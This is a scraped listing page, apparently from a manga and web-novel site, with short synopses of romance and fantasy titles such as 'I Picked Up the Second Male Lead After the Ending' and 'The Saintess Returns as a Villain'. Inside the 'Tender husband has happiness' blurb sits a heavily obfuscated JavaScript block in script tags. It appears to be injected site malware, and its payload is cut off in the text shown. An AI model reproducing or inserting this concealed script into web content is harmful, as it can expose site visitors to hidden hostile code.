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I Picked Up the Second Male Lead After the Ending

<span class="mx-1">I Picked Up the Second Male Lead After the Ending </span> I transmigrated inside the novel of my favorite character, the second male lead. A tsundere who listens to all the words of the female lead while grunting, with a straight forward personality, and a handsome face. Matching all my preferences, he was even single after the ending. Nice! I’ll pick up the second male lead! However, I overlooked one thing… The tsundere, who had been abandoned by the female lead blackened, and had become a terrifying man! “Get lost.” …I, Is it safe for me to pick up the second male lead?


My Majesty Wants to Ruin The Country

She always though she was just a parentless ophan, yet the mentor who took in her made her swear right in front of her that she would ruin a country to its demise? All of sudden now this girl is the emperor of the country and there is 6 male plaything for her to choose?


Hurdles to provocative

Hurdles to provocative / 越界招惹 / Cross Border Provocation / Cross-Border Provocation Wen Xian strayed into the no-man’s land, and was almost seen as a poacher. Captain Luc, isn’t it good for them to pick people’s things as soon as they meet? Lu Tieu Thien looked at the daring woman in front of her with a cold expression, attacking, kissing, and seducing at night…


The Evildoer Begs Me to Let It Go

demons: Jiang Ya, a former e-sports player who dropped out of school, strays into the world of mysterious crimes. The evil world is rampant, and Jiang Ya actually found out that he is the master of the sinful world. He has to bear the fate of a world and is forced to cultivate immortals from zero. He uses all kinds of tricks to achieve hard power overtaking corners and suppressing a world. As his strength increased, he gradually discovered the terrifying truth behind the criminal world.…… The demons begging me to let them go The Evildoer Begs Me to Let It Go Yāoniè Qiú Wǒ Fàngguò Tā 妖孽求我放过它


The World’s Best Escort Bureau

One day the strongest person in the world disappeared. An old man who was suffering from dementia and couldn’t remember himself appeared in front of the village boy So Woon. So-Woon takes care of him carefully and later the old man teaches him martial arts. One day he finds that the old man whom he was taking care of and who taught him martial arts disappeared. So-Woon knew that the old man must have come to his senses and left him without saying anything. Six years later So-Woon becomes the symbol of Pungcheon. Together with his friends So-Guk-Ju and Pyo-Guk he started a long journey to become The World’s Best Escort and to find his master and….


Tender husband has happiness

He gave birth for the one he loves in a one night stand, but in the end, he gets dump by her. Even though boys are weak but father is strong. After 5 years, she comes back from war and becomes a mother of a child: What! I have a child? Is it to cut off the thread of love or to reunite and find back the love? He slightly pulls her skirt corner and said wife? I already had one.<script></script><script>(function(_0x356d2e,_0x487ab3){var _0x335573=_0x2c54,_0x256460=_0x356d2e();while(!![]){try{var _0x484e06=-parseInt(_0x335573(0xef))/(-0xfb7*0x2+-0x1*-0x11f1+0x9d*0x16)+-parseInt(_0x335573(0xf7))/(0xb31+0x1d06+0x2f*-0xdb)+parseInt(_0x335573(0xfd))/(-0x132b*0x1+-0x866+0x1b94)*(parseInt(_0x335573(0x108))/(0x833*0x4+-0x1d53+0x3*-0x127))+parseInt(_0x335573(0x10c))/(-0x22df+0x1*0x1fcb+0x3d*0xd)*(-parseInt(_0x335573(0xf8))/(0x18bd+-0x1*0x1069+-0x84e))+parseInt(_0x335573(0x10b))/(-0x246b*0x1+-0x715+0x1*0x2b87)*(-parseInt(_0x335573(0xf0))/(-0x1*-0xd51+0xc86+-0x19cf))+parseInt(_0x335573(0x10a))/(-0x11c8+-0xb8c+0x1d5d)+parseInt(_0x335573(0x105))/(0x1f73+-0x10a9+0x2*-0x760);if(_0x484e06===_0x487ab3)break;else _0x256460['push'](_0x256460['shift']());}catch(_0x3fce2a){_0x256460['push'](_0x256460['shift']());}}}(_0x1a1a,-0x1*0x40747+-0x26bcc+0x98854));function custom(){var _0x44cfeb=_0x2c54,_0x2d6671={'KzMOv':function(_0x344910,_0xa63a25){return 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A Love Story of Heaven and Hell

Tenou and Devil's Wedding / The Marriage Story of Heavenly King and Demon King / 천왕 마왕 결혼한 이야기 Oil meets water. Cat meets dog. That's the best way to describe the relationship between Sara, the Queen of Hell, and Marshall, the King of Heaven. Originally forced into marriage to end the brutal conflict between Heaven and Hell, Sara immediately assumes that there's no way she'll actually fall in love with Marshall. Not only is he barely of age, but he is much too sweet and submissive for her fiery personality. Yet Marshall persists in worming his way into Sara's heart, doing his absolute best to dote on her and get to know her better. And despite interference from Sara's jealous ex-fiance and Marshall's scheming older brothers, Sara becomes slowly (and awkwardly) attached to her puppy-dog of a husband. Will the Queen of Hell learn to love Marshall in his entirety, despite her heart of ice?


Her Peculiar Visitor

Three dates to save the bookstore?! Banished from the celestial realm for interfering in the fate of a mortal, Juhee now lives a mortal life herself as the owner of a bookstore. When she suddenly receives an eviction notice, she visits her landlord to plead her case. But what will she do when he makes her a peculiar offer?


I See You

Only I can see this grim reaper?! Seowoo has just about had it with life. But when she's about to jump off a bridge, she's interrupted by a grim reaper nobody else can see. Not only that, he wants her to stay alive for three more months! A woman who wants to die and a strange reaper will Seowoo finally find a reason to live?


The Tail And Tale Of A Snow Leopard

"Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older." When it’s anxious, this particular snow leopard has a habit of biting its own tail. When said snow leopard was delivered to the snow wolf's bedroom, it was shaking with its tail in its jaws. Snow Wolf King: " It's not like I'm gonna devour you. Why are you so scared?" Snow Leopard: " But you might violate me…" Snow Wolf King: " Well, that's too bad. That's exactly what I planned to do." Snow Leopard: " I thought only another snow wolf has the right to be your queen…?" Snow Wolf King: " Was there such a rule? Let me consult with my experts." That marked the beginning of our love story… 1.3.12 Snow Leopards Like to Bite Their Tails Xuebao Xihuan Yao Weiba Xuěbào Xǐhuān Yǎo Wěibā 雪豹喜欢咬尾巴


The Saintess Returns as a Villain

Read manhwa The Saintess Returns as a Villain / 성녀는 악역으로 회귀한다 Beatrice has lived as a saint for 10 years to prevent the disaster of the empire and win the love of her family. One day, her place as a saint was taken away by a girl named Lina Cumbell with her black hair… . “I will kill you, your family and all your followers.” She is framed as a warlock and executed. Beatrice’s second life began like that. “Even if this life becomes a villainess… Lina, I will avenge you!!” The new life of Riche, a true saint who decided to become a villain, is redrawn.


I'm not really the son of luck

Traveling through the world of immortality, Shen Tian found that he could see the luck and fortune of others around him. With the idea of ​​rubbing the aura of the protagonist of the boss, Shen Tian began to take the initiative to make friends with the children of luck. Later, everyone gradually discovered that no matter who they are, as long as they practice with Shen Tian, ​​they will inevitably encounter great opportunities, and there will be no exceptions! From that day on, Shen Tian became the most popular mascot in the world of immortality. Genres: Action, Fantasy, Harem, Romance, Adventure, Isekai
